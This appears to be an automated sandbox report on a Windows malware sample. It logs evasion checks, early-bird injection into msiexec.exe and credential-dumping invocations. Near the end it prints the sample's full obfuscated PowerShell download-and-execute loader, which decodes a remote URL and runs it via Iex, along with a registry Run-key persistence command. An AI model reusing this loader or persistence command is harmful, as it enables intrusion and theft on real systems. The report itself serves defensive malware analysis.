Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 13_2_0040DD85
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5329 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4579 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7959 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1728 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 8.8 %
Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 8.3 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3496 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7048 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756 Thread sleep count: 231 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756 Thread sleep time: -115500s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6848 Thread sleep count: 1334 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6848 Thread sleep time: -4002000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6848 Thread sleep count: 8097 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6848 Thread sleep time: -24291000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_21F510F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 9_2_21F510F1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0040AE51 FindFirstFileW,FindNextFileW, 13_2_0040AE51
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 15_2_00407EF8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 16_2_00407898
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00418981 memset,GetSystemInfo, 13_2_00418981
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: msiexec.exe, 00000009.00000002.3042211181.000000000628E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
Source: msiexec.exe, 00000009.00000002.3042211181.0000000006273000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\VMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&0001d0-94f2-00a0c91efb8b}\
Source: msiexec.exe, 00000009.00000002.3042211181.00000000062C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: bhv68C0.tmp.13.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: powershell.exe, 00000002.00000002.1980472638.00000267C83A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: bhv68C0.tmp.13.dr Binary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
Source: C:\Windows\SysWOW64\msiexec.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_21F511EA GetFileAttributesW,LdrInitializeThunk,LdrInitializeThunk, 9_2_21F511EA
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_21F560E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_21F560E2
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 13_2_0040DD85
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 13_2_004044A4
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_21F54AB4 mov eax, dword ptr fs:[00000030h] 9_2_21F54AB4
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_21F5724E GetProcessHeap, 9_2_21F5724E
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_21F560E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_21F560E2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_21F52B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_21F52B1C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_21F52639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_21F52639

HIPS / PFW / Operating System Protection Evasion
barindex
Early bird code injection technique detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_6112.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6112, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3980, type: MEMORYSTR
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3860000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI;function Foreslaa($Tvivlstilfldet){If ($Omittancesforstrke116) {$Photoelectronics++;}$Transformationsprocesser=$Selskabsrevisors+$Tvivlstilfldet.'Length'-$Photoelectronics; for( $Omittance=4;$Omittance -lt $Transformationsprocesser;$Omittance+=5){$Benzanthrone++;$Vandsskader+=$Tvivlstilfldet[$Omittance];$Styreformerne15='Uproblematiske';}$Vandsskader;}function Heraclitean($Shagrag){ & ($Liljekonvals) ($Shagrag);}$Noden=Foreslaa 'CuprMTorpoStigzSc tiUninlS orlCarbaSkul/Lige ';$Noden+=Foreslaa 'Intr5 od.Slip0Poli Omf( Ed WBairiPreinRummd In oRandwHumosKjru FemaN recT Sta Ste1 Cab0Jux .Ixo 0 For;Sind TalaWGorbiVaesnHem 6.tvk4Afst; v.d SattxSt.b6Kabo4p.lk; Pet Visur etev Udh:Khed1Agit3Brig1Else. Lai0Edul)Deli spirGSlage rocLandkDemooW ys/ .ri2Di k0 .en1,ijo0Rest0Auto1Enla0Id.o1S am BosFAfskiMarkrP omeF ihf teo,entxRobo/U es1Sand3Trav1 Cou.Indl0a em ';$Deglutitive=Foreslaa 'MotiuSne,SHjesE An.RBou - RedaOto G K tE chenN nsTOxgo ';$Spisekortet=Foreslaa 'Glach P.itSubstMod.pDogg:Tiec/ I.t/ConnaHererFesttu.viiansaeFa nr diriCi r.cl.nrDecaohypn/At ogSfol/TessSPersk R,liEksifSko f gale.uchrNor d ErnkTy ek Un eBor re itsSprj.NunnpObstcEngrx.jla ';$Allineate=Foreslaa 'Fila>F.ru ';$Liljekonvals=Foreslaa '.amuIBisaePo.kxCor ';$Brneormens='Sybaritternes';$Omittanceronsided='\Rgnes.Und';Heraclitean (Foreslaa 'Forb$Ko,fgShorLUnifOEpigBC moASaprlOmf :kautFPromOU gyZPoutIForfnSu,pe AddSLunesKins=Co.e$ Lu,eQuesNSvnlVDell:UnscanonvPRingpDisuDkakiA omaTEquiAThys+Komp$ oodoSn wmU piiNoonTAwarTMag ABearnzibeCFortEUndeRKil o O,enYppesSystiAftedFarieDiopdMukk ');Heraclitean (Foreslaa 'or a$SvorG L,vLCe.tOko,mbSolba HypLOut,:WaremWearA P arU,vojBenfU So,Nfor Sanop= Cos$ConuSH.ftPFan I IsosRochELat k chaOUncorOmk,tCherelierTNe.p.Es asOrieP StrLS vsiLocutAfgi( Min$AkkuaG nzl CollPhalI BdeN higeS ngA ArmtIliaeTric) Sta ');Heraclitean (Foreslaa 'Pane[EscoNMythEDrysTHelt.scotS nhETovbrPladvRdbrICentCAfb EVas p ynaOO.tbIBedsnParat VapM orkaForbnMarmapenngHoppeShirrHals].nal:Leve:,uttSHov elovmcDisbU ,arRErriIEschTU bryDelkp AntRTeosOTunntKulkO NolCUdhooRendlPe.s Prey=Data U,or[ uleN ukeToldT Gez.Af,aSKl,keConscFormuNe tRManuIGysetspiryPrevPc.arrunr,OStamtCe loPhasCStamoD sil NomtaqqaY F lpschiE Ufo]Fend:E.cy:Rstetw nwlOmk sBerr1For,2Siti ');$Spisekortet=$marjuns[0];$Resident=(Foreslaa 'Para$Carag,verl FebOForebSe mAbattLRveh: ordoGoosVW geE EverEupssSu cp Ad rprofiG,lenI nkGHyraE,kerLskn.SCandEs bcRDe h=Fljenu.trE ExeWNon.-B skoBarnbTrskjWoodeOptrcUtydT Pre UncsWresY SansStertH,tteArmomPost. ditnNitrET.avto pa. Sumw D mEZealb ealcSuboLUntwiPerie PrenIntetTh e ');Heraclitean ($Resident);Heraclitean (Foreslaa 'Hand$klagOPecuvDyste HalrSt,msMundps,ntr ReniV ounTria Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cgtcjah" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\miynksssgv" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\miynksssgv" Jump to behavior
